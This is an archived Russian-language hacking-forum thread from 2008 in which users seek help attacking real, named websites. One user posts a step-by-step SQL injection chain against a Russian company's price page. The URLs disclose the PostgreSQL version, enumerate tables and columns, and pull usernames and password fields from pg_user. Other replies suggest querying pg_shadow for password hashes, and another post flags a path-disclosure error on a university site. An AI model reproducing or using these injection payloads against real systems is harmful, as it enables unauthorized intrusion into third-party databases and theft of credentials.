ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.03.2008, 09:47
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от satana8920
да я тут просто решил затроянить инет  не знаю че делать на ФТП денег у менянету а другие способы загрузок я не знаю
не подскажеШЬ?КАК ЕЩЕ МОЖНО ИНСТАЛИТЬ Иди лучше книжку почитай.
__________________
|
|
|
09.03.2008, 10:02
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
http://www.sports.kz/index.php?st=-1'
как юзать? что то ничего там не катит толи фильтры толи хз даже пробел затолкать не могу
|
|
|
|
10.03.2008, 12:41
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
2truelamer
Сообщение от truelamer
ВОпрост такое вообще взламывается?
Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[FormatException: Input string was not in a correct format.]
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
System.Convert.ToInt32(String value) +47
ustu.subs.Page_Load(Object sender, EventArgs e) in \\snatch\c$\Inetpub\dynamic\ustu.ru\subs.ascx.cs:3 8
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Page.ProcessRequestMain() +750
Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
Енто ошибка в скрипте изпользовать можно только как раcкрытие пути !
Последний раз редактировалось Constantine; 10.03.2008 в 13:45..
|
|
|
|
10.03.2008, 20:38
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--
PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--
выводит много интересного, но я выбрал pg_user
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--
результат:
usecatupd
usesuper
usecreatedb
usename
usesysid
passwd
valuntil
useconfig
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--
первый это админ
login: postgres
pass: ********
Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....
|
|
|
|
10.03.2008, 20:58
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
может пасс ********?
|
|
|
|
10.03.2008, 21:00
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Сообщение от Piflit
может пасс ********?
Нет, там у всех так пасс выглядит, а когда я запрос составил чтоб пароль в др ячейку копировать то база сказала что не может копировать поле hide в text
т.е. пароли имеют тип hide
|
|
|
|
11.03.2008, 00:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 truelamer
Ты просто неудачную таблицу выбрал. В ней нет паролей ,что-то типа файла passwd в unix
Если точнее, то системная таблица с информацией о юзерах
P.S но версия Piflit мне тоже понравилась
Последний раз редактировалось jokester; 11.03.2008 в 00:38..
Причина: дополнение
|
|
|
|
11.03.2008, 01:00
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
это тебе надо в pg_shadow лезть, но не факт что прав хватит
|
|
|
|
11.03.2008, 01:52
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
А точнее-факт ,что не хватит. Там куча других данных и возможностей,смотря какая цель
|
|
|
|
11.03.2008, 05:53
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Цельбыла одна: научиться.
Всем спасибо, всем плюсую.
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
